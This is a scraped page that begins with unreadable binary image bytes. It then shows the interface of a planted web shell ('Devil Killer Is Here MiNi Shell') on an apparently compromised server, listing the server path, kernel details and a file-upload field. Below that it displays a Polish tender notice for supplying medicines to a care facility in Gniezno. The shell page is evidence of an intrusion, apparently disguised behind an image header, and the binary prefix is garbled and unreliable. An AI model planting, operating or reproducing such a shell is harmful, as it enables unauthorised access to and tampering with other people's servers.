JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211108/0026032801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa leków dla Zakładu Opiekuńczo Leczniczego w Gnieźnie ul. Elizy Orzeszkowej 27 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD OPIEKUŃCZO-LECZNICZY SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 639815948</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Elizy Orzeszkowej 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614262455</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zol@zolgniezno.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zolgniezno.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zakład Opiekuńczo-Leczniczy SP ZOZ </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa leków dla Zakładu Opiekuńczo Leczniczego w Gnieźnie ul. Elizy Orzeszkowej 27 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d524800a-406b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00260328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004177/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa leków dla Zakładu Opiekuńczo - Leczniczego w Gnieźnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d524800a-406b-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platformy do obsługi postępowań przetargowych, dostępnej pod adresem: https://ezamowienia.gov.pl/<br/>2)	poczty elektronicznej: zolad@zolgniezno.com.pl lub https://epuap.gov.pl/wps/portal<br/>[Adres ESP (skrytki ePUAP: /ZOLGniezno/SkrytkaESP]<br/>- z zastrzeżeniem, iż oferta, wraz z załącznikami mogą zostać przekazane wyłącznie za pomocą powyższej Platformy zakupowej zamawiającego dostępnej pod adresem https://miniportal.uzp.gov.pl/ lub https://epuap.gov.pl/wps/portal<br/>[Adres ESP (skrytki ePUAP: /ZOLGniezno/SkrytkaESP]<br/>2.	Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z Platformy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z „OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”. <br/>1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf <br/>2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: <br/>a)	.zip <br/>b)	.7Z <br/>3)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. <br/>4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. <br/>5)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>6)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. <br/>7)	Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. <br/>8)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. <br/>9)	Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji. <br/>10)	Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków. <br/>11)	Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. <br/>12)	Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. <br/>13)	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. <br/>14)	Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa leków dla Zakładu Opiekuńczo – Leczniczego w Gnieźnie. Zgodnie z załącznikiem nr 1a formularz asortymentowo – cenowy do SWZ<br/>2.	Zamawiający dopuszcza zaoferowanie produktów równoważnych w innej postaci.<br/>3.	Zamawiający dopuszcza tylko zakup produktów zarejestrowanych jako leki, a nie akceptuję suplementów diety.<br/>4.	Zamawiający dopuszcza możliwość zaoferowania leków w innych opakowaniach handlowych przeliczając do pełnych opakowań w górę.<br/>5.	Zamawiający dopuszcza możliwość zakupu zamiennika danego produktu leczniczego <br/>w przypadku gdy na rynku nie można uzyskać zaoferowanego w ofercie produktu lub wstrzymano bądź zakończono produkcję danego leku (o tych samych parametrach <br/>i właściwościach) z zastrzeżeniem, iż cena jednostkowa zamiennika nie przekracza ceny leku (odpowiednika) podanego w ofercie za zgodą osoby upoważnionej przez Zamawiającego. Zamawiający zastrzega, że zamiennik zaoferowanego produktu leczniczego winien posiadać równoważność farmaceutyczną, przez co należy rozumieć sytuację, w której porównywane leki zawierają taką samą ilość środka leczniczego w takiej samej (lub zasadniczo podobnej - np. tabletki, kapsułki) postaci leku, odpowiadającej tym samym porównywalnym normom i które przeznaczone są do podawania taką sama drogą. Z uwagi na fakt, że równoważność farmaceutyczna nie warunkuje równoważności terapeutycznej, gdyż różnice w zakresie substancji uzupełniających i procesu produkcyjnego mogą powodować różnice w rozpuszczaniu oraz biodostępności, a w konsekwencji w działaniu środka farmaceutycznego Zamawiający wymaga również by zaoferowane produkty lecznicze winny posiadać równoważność terapeutyczną. Pod pojęciem równoważności terapeutycznej należy rozumieć sytuację w której dwa środki są równoważne farmaceutycznie i po ich podaniu w takiej samej dawce ich efekty zarówno w zakresie skuteczności jak i bezpieczeństwa są takie same, jak można było oczekiwać na podstawie odpowiednich badań. Powyższa procedura zakupu powinna być zrealizowane w terminie do 48h.<br/><br/>6.	Oferowane produkty, w zakresie objętym przedmiotem zamówienia, muszą posiadać aktualne świadectwo rejestracji, atest, świadectwo jakości, deklarację zgodności lub zezwolenie dopuszczające do obrotu i stosowania w podmiotach wykonujących działalność leczniczą, a ponadto właściwe oznakowanie opakowań zgodne z obowiązującymi w tym zakresie przepisami. <br/>7.	Ilości wymienione w załączniku Nr 1a są wielkościami szacunkowymi, w trakcie realizacji zamówienia mogą ulec zwiększeniu lub zmniejszeniu. Z tytułu nie wykorzystanej części umowy Wykonawcy nie będą przysługiwały żadne roszczenia poza roszczeniem o zapłatę za wykonane dostawy leków<br/>8.	Wielkości zapotrzebowania uzależnione będą od bieżących potrzeb Zamawiającego.<br/>9.	Okres ważności leków nie może być krótszy niż 12 miesięcy od daty dostawy.<br/>10.	Zmiana cen dopuszczalna jest tylko w przypadku:<br/>a) obniżenia ceny urzędowej leku<br/>b) zmiany stawki podatku VAT<br/>c) obniżenia ceny producenta lub wykonawcy<br/>10. W przypadku stwierdzenia wad lub uszkodzeń dostarczonego towaru, Wykonawca zobowiązuje się na własny koszt dokonać wymiany na towar wolny od wad i uszkodzeń<br/>11. Termin i miejsce dostawy leków:<br/>a) od momentu zgłoszenia przez Zamawiającego - 24 godz.<br/>b) w przypadku „leku na ratunek” - 8 godz.<br/>c) miejsce dostawy: Zakład Opiekuńczo – Leczniczy w Gnieźnie, ul. E. Orzeszkowej 27 – Dział Farmacji Szpitalnej <br/>d) Terminy dostaw: od poniedziałku do piątku w godzinach od 735 do 1400.<br/>12. Prawo opcji<br/>Zamawiający zastrzega sobie prawo opcji.<br/>W sytuacjach, których, nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość zrealizowania większego zakresu dostaw (danego asortymentu) – max do 20 % wielkości zamówienia, po stawkach (cenach) i na warunkach (terminach dostaw) określonych w ofercie Wykonawcy, Prawo opcji przysługuje Zamawiającemu w trakcie obowiązywania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo opcji.<br/>W sytuacjach, których, nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość zrealizowania większego zakresu dostaw (danego asortymentu) – max do 20 % wielkości zamówienia, po stawkach (cenach) i na warunkach (terminach dostaw) określonych w ofercie Wykonawcy, Prawo opcji przysługuje Zamawiającemu w trakcie obowiązywania umowy. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-12-16 do 2022-12-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">9. SPOSÓB OCENY OFERT <br/>9.2.2. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert: <br/>a)	cena – waga kryterium 60%, <br/>b)	termin realizacji reklamacji – waga kryterium 40%. <br/>9.2.3. Zasady oceny kryterium &#34;Cena&#34; (C) <br/>W przypadku kryterium &#34;Cena&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania: <br/> <br/> Cena najtańszej oferty [PLN] <br/> C = ------------------------------------------- X 60 <br/> Cena badanej oferty [PLN] gdzie: <br/>C - ilość punktów jakie otrzyma badana oferta za kryterium &#34;Cena&#34; <br/>Maksymalna ilość punktów jaką może otrzymać oferta za kryterium &#34;Cena&#34; – 60 pkt. (waga kryterium – 60%). <br/>9.2.4. Zasady oceny kryterium &#34;Termin realizacji reklamacji&#34; (G) <br/>W przypadku kryterium &#34;Okres gwarancji&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania: <br/>Najkrótszy oferowany termin<br/>Realizacji reklamacji<br/>G = --------------------------------------------------------- X 40 <br/>Termin reklamacji oferty badanej<br/>gdzie: <br/>G – ilość punktów jakie otrzyma badana oferta za kryterium &#34;Termin realizacji reklamacji <br/>Maksymalna ilość punktów jaką może otrzymać oferta za kryterium &#34;termin realizacji reklamacji&#34; – 40 pkt. (waga kryterium – 40%).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najkrótszy oferowany termin Realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> INFORMACJE O WARUNKACH UDZIAŁU W POSTĘPOWANIU <br/>6.1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 112 ust. 1 ustawy Pzp dotyczące: <br/>6.1.1. zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie. <br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>a) Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi zezwolenie na prowadzenie działalności farmaceutycznej lub inny dokument uprawniający do obrotu hurtowego produktami leczniczymi na terenie Polski oraz posiada zezwolenie na obrót środkami psychotropowymi. <br/>6.1.3. sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie. <br/>6.1.4. zdolności technicznej lub zawodowej <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie.<br/>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły „spełnia - nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SWZ) dołączonych do oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza, przy jednoczesnym zachowaniu wymagań określonych w art. 454 i 455 ustawy – Prawo zamówień publicznych, możliwość dokonania następujących zmian postanowień zawartej umowy:<br/>a)zmiany adresu siedziby, numeru telefonów, formy prawnej Wykonawcy lub Zamawiającego.<br/>b)zmiany osób wskazanych w umowie zarówno po stronie Wykonawcy, jak i Zamawiającego, <br/>c)zmiany przepisów prawa powszechnie obowiązujących w zakresie mających wpływ na realizację przedmiotu zamówienia,<br/>d)wydłużenia czasu trwania umowy w sytuacji niewykorzystania przez zamawiającego przedmiotu umowy przy zachowaniu jej wartości,<br/>e)wydłużenia czasu trwania umowy w sytuacji skorzystania zamawiającego z prawa opcji,<br/>f)wydłużenia czasu trwania umowy spowodowane okolicznościami niezależnymi od stron zawartej umowy<br/>g) gdy producent produktu zakończył produkcję lub wycofa ze sprzedaży (rynku) produkt zaoferowany przez Wykonawcę w ofercie, w okresie od dnia podpisania umowy do dnia dostawy – Zamawiający dopuszcza możliwość dostarczenia innego leku o lepszych właściwościach, parametrach technicznych i jakościowych niż podanych w niniejszej specyfikacji ,<br/>h) zmiany przedmiotu zamówienia w przypadku wprowadzenia do obrotu lub zaproponowania przez Wykonawcę nowego produktu, odpowiadającego produktowi będącemu przedmiotem zamówienia, pod warunkiem, że nowy produkt spełnia wszystkie wymagania produktu objętego ofertą w zakresie jego zgodności z SWZ i nie powoduje wzrostu ceny ofertowej – co wykonawca powinien szczegółowo udokumentować,<br/>i) w przypadku gdy obniżeniu ulegnie urzędowa cena danego produktu – Zamawiający dopuszcza możliwość zmiany ceny wynagrodzenia umownego za dany lek o różnicę między ceną urzędową, która obwiązywała w dniu składania ofert, a wartością ceny urzędowej po zmianie. <br/>j) gdy zmianie ulegnie urzędowa stawka podatku VAT – zamawiający dopuszcza możliwość zmiany wartości wynagrodzenia umownego, przy czym zmianie ulegnie wyłącznie cena brutto , cena netto pozostanie bez zmian, <br/>k) zmiany ceny w przypadku zmiany sposobu konfekcjonowania (wielkość opakowania) wprowadzonej przez producenta produktu w trakcie realizacji niniejszej umowy – z zachowaniem zasady proporcjonalności,<br/>l) obniżenia ceny produktów w przypadku akcji promocyjnych prowadzonych przez Wykonawcę lub producenta,<br/>m) w przypadku gdy zmiany będą korzystne dla Zamawiającego i nie będą: <br/>- wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;<br/>- modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnych.<br/> <br/>2. Warunki dokonania zmian: <br/>a) Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa powyżej,<br/>b) Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do złożenia wniosku o zmianę postanowień umowy.<br/>3. Wniosek o którym mowa w pkt 2 lit. b) musi zawierać: <br/>a) opis propozycji zmiany,<br/>b) uzasadnienie zmiany,<br/>c) opis wpływu zmiany na warunki realizacji umowy.<br/>4. Zamawiający dopuszcza zmianę terminu wykonania umowy w przypadku nie zrealizowania umowy w terminie 12 miesięcy w ramach maksymalnego zakresu prawa opcji. W tej sytuacji umowa może zostać przedłużona do czasu wykorzystania pełnej wartości wynikającej z prawa opcji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, 